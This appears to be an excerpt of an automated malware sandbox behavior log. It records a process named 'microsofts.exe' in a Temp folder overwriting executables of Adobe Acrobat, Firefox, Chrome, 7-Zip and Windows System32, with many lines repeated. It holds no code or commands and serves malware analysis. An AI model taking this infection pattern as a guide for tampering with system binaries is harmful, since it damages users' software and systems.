                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe File written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\vds.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\alg.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\7-Zip\7zFM.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\snmptrap.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\Spectrum.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\Locator.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\7-Zip\7z.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\AppVClient.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\SysWOW64\perfhost.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\7-Zip\7zG.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\msiexec.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\VSSVC.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\wbengine.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Windows\System32\SearchIndexer.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe  System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
